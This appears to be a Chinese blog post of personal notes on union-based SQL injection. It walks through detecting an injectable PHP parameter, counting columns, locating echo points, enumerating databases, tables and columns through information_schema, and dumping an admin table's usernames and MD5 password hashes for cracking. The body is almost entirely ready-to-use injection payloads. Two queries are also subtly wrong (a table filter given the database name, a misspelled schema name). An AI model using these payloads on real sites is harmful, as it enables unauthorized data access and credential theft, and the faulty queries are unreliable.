美文网首页
小李哥sql注入笔记

小李哥sql注入笔记

作者: FKTX | 来源:发表于2017-12-12 19:03 被阅读0次

1.判断是否可以注入

www.xxx.com/123.php?id=125

'页面有部分不显示,不报错

www.xxx.com/123.php?id=125

and 1=1没改变

www.xxx.com/123.php?id=125

and 1=2报错

则有注入

2.可以注入的话

order by判断列数

www.xxx.com/123.php?id=125

order by 5 报错

www.xxx.com/123.php?id=125

order by 4 不报错

说明有4列

3.确定列数之后

union 联合查询,找到回显点(假设2 4)

在页面相应地方会显示2,4

4.union联合查询

www.xxx.com/123.php?id=125

www.xxx.com/123.php?id=-125

union select

1,user(),3,4

找到当前数据库用户 root@localhost

5.→

www.xxx.com/123.php?id=-125

union select

1,database(),3,4

显示当前数据库名称 db111

6.→

www.xxx.com/123.php?id=-125

union select

1,group_concat(table_name),3,4 from

information_schema.tables where table_schema = 'db111'

回显db111数据库的所有表名(合并在一起逗号隔开的),找到用户名所在表admin123

7.→

www.xxx.com/123.php?id=-125

union select

1,group_concat(column_name),3,4 from

information_schema.columns where table_name = 'db111'

找到用户名列username

找到密码所在列password

8.→

www.xxx.com/123.php?id=-125

union select

1,username,3,password from db111.admin123

回显出用户名:xiaoming123

密码:  一串md5加密字符,解密即可

@@version_compile_os 获取操作系统

获取所有数据库名称

select group_concat(schema_name) from information.schema.schemata

相关文章

  • 小李哥sql注入笔记

    1.判断是否可以注入 www.xxx.com/123.php?id=125 '页面有部分不显示,不报错 www.x...

  • web安全之SQL注入

    2018/07/06 23:41 慕课网web安全之SQ之注入课程学习笔记 什么是SQL注入? 如何寻找SQL注入...

  • DVWA-SQL Injection(SQL注入)

    本系列文集:DVWA学习笔记 SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执...

  • WebGoat 靶场笔记

    sql注入笔记1.String SQL injection SELECT * FROM user_data WHE...

  • web--杂烩

    这个笔记有点乱 0x01 cms XDCMS1、SQL注入漏洞 注册会员处的 SQL 注入/system/modu...

  • sql注入学习

    sql注入笔记! 判断是否存在注入漏洞 经典的单引号判断。 select * from xx where id= ...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • 笔记:web漏洞

    SQL注入 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,...

  • 谈谈sql注入之原理和防护(-)

    谈谈sql注入(二)谈谈sql注入(三)谈谈sql注入(四)所谓SQL注入,就是通过把SQL命令插入到Web表单提...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

网友评论

      本文标题:小李哥sql注入笔记

      本文链接:https://www.haomeiwen.com/subject/debbbxtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|小李哥sql注入笔记|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!